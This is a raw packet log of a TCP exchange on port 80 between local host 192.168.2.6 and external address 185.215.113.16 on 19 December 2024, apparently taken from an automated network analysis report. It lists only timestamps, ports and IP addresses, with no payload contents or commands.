Dec 19, 2024 10:10:19.855031013 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.855087042 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.855154037 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.858354092 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.858467102 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.858501911 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.858536959 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.861742973 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.861825943 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.861882925 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.865164995 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.865245104 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.865372896 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.865372896 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.868521929 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.868602037 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.868673086 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.871860027 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.871912956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.871962070 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.875211954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.875266075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.875432014 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.875485897 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.878628016 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.878762960 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.878829002 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.882167101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.882191896 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.882445097 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.885507107 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.885546923 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.885608912 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.888762951 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.888962030 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.889096975 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.889144897 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.892107010 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.892168045 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.892455101 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.892616987 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.895703077 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.895756006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.895756960 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.895806074 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.899117947 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.899142981 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.899194956 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.902268887 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.902340889 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.902390003 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.902443886 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.905807972 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.905834913 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.905884027 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.909092903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.909156084 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.909261942 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.909261942 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.912375927 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.912538052 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.912705898 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.912877083 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.915749073 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.915797949 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.915889025 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.915942907 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.919416904 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.919507980 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.919536114 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.919580936 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.922985077 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.923037052 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.923089981 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.923136950 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.925884962 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.925930977 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.925997019 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.926042080 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.929497004 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.929543972 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.929567099 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.929723978 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.932985067 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.933046103 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.933079004 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.933125973 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.935992002 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.936038017 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.936113119 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.936157942 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.939321995 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.939368010 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.939441919 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.939485073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.942456007 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.942501068 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.942565918 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.942609072 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.945549011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.945602894 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.945605040 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.945645094 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.991435051 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.991460085 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.991774082 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.992361069 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.992522955 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.992810011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.992963076 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.993021011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.993071079 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.995202065 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.995251894 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.995332956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.995379925 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.997594118 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.997651100 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.997728109 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:19.997777939 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:19.999991894 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.000040054 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.000119925 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.000266075 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.002664089 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.002715111 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.002737999 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.002783060 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.005003929 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.005019903 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.005052090 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.005068064 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.007273912 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.007328033 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.007380009 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.007426977 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.009586096 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.009637117 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.009749889 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.009794950 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.012074947 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.012120008 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.012128115 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.012172937 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.014497995 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.014549017 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.014837980 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.014883995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.017184019 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.017235041 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.017297029 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.017342091 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.020045042 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.020107985 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.020241976 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.020288944 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.022768974 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.022814035 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.022902966 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.023088932 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.025031090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.025080919 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.025214911 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.025259972 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.027805090 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.027848959 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.028068066 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.028115988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.030477047 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.030524015 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.030576944 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.030622005 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.033041000 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.033087015 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.033333063 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.033380032 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.035218954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.035268068 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.035309076 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.035356998 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.037798882 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.037844896 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.037878036 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.037921906 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.039885044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.039931059 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.039985895 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.040030003 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.042151928 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.042196035 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.042270899 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.042313099 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.044039011 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.044083118 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.044135094 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.044179916 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.046354055 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.046399117 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.046458006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.046503067 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.048304081 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.048352957 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.048398972 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.048444986 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.050333023 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.050378084 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.050507069 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.050554037 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.052351952 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.052401066 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.052440882 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.052488089 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.053597927 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.053642988 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.053776026 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.053819895 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.055015087 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.055242062 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.055243015 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.055330038 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.056581020 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.056633949 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.056729078 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.056777954 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.057991028 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.058037043 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.058140039 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.058182001 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.058948040 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.058993101 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.059058905 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.059102058 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.060064077 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.060102940 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.060113907 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.060147047 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.060842037 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.060889959 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.060925007 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.060966969 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.061724901 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.061768055 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.061825037 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.061868906 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.062787056 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.062832117 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.062886953 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.062931061 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.063731909 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.063777924 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.063815117 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.063858032 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.064666986 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.064709902 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.064752102 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.064795971 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.065644026 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.065689087 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.065706015 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.065749884 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.066818953 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.066865921 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.066881895 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.066927910 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.067739964 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.067785978 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.067840099 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.067884922 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.068917036 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.068964005 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.069025993 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.069072008 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.070056915 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.070105076 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.070159912 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.070204020 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.071245909 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.071291924 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.071372032 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.071417093 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.072376013 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.072489977 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.072499990 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.072557926 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.073600054 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.073698997 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.073764086 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.074736118 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.074760914 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.074820995 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.075875044 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.075967073 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.076011896 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.076061010 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.077063084 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.077116013 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.077169895 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.077214003 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.078358889 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.078391075 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.078402042 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.078428984 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.079396963 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.079441071 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.079530954 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.079574108 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.080571890 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.080620050 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.080723047 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.080765009 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.081748009 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.081794024 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.081811905 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.081852913 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.188404083 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.188457012 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.188589096 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.188590050 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.188653946 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.188709021 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.188760996 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.188802958 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.188813925 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.188843966 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.189958096 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.190016985 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.190017939 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.190069914 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.190727949 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.190792084 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.190819979 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.190872908 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.191437006 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.191483974 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.191494942 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.191545010 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.192223072 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.192276001 CET	49881	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:20.192312956 CET	80	49881	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:20.192363977 CET	49881	80	192.168.2.6	185.215.113.16
